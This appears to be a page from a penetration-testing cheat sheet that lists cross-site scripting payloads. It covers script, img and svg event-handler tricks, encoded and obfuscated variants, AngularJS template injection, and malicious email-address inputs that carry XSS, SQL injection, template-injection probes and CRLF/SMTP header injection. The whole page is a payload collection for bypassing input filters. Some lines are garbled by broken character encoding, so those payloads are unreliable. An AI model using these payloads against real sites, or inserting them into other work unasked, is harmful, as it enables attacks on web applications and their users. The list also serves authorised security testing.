XSS
Cross-Site Scripting (XSS) payloads
Generic
'';! - "<XSS>=&{()}
\'-alert(1)//
\';alert(1)//
\"-alert(1)}//
alert`xss`;
'-alert(1)-'
'}alert(1);{'
'}alert(1)%0A{'
';-alert(1)//
\'}alert(1);{//
'-alert(1)-'
'-alert(1)-'
"onmouseover="alert(1)
onerror=alert`1`
param=abc`;return+false});});alert`xss`;</script>
return+false});
});
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascriptΪlert(1)
<script>alert(1)</script>
<script>\u0061lert(2)</script>
<script>\u{61}lert(3)</script>
<script>\u{0000000061}lert(4)</script>
<%00script>alert(5)</script>
<script>al%00ert(6)</script>
script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
<<script>alert("XSS");//<</script>
<img src=x onerror=alert(7) />
<img/src=x a='' onerror=alert(8)>
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<svg/onload=alert``>
<svg onload=alert('XSS')>
<svg/onload=eval(atob(βYWxlcnQoJ1hTUycpβ))>
<svg onload=alert(1)>
"><svg onload=alert(1)>
<svg><x><script>alert('1')</x>
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
<iframe src="javascript:alert(1)">
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}Phone Inputs
10203040;π©π‘π¨π§π-ππ¨π§πππ±π=<π¬ππ«π’π©π>ππ₯ππ«π(1)</π¬ππ«π’π©π>Email Inputs
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
"<%=7*7%>"@example.com
test+(${{7*7}})@example.com
"'OR1=1--'"@example.com
user@test.burpcollaborator.net
user@[127.0.0.1]
user@email=user@example.com
%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com\r\nRCPT TO:<victim+"@test.comReferences
Last updated
Was this helpful?
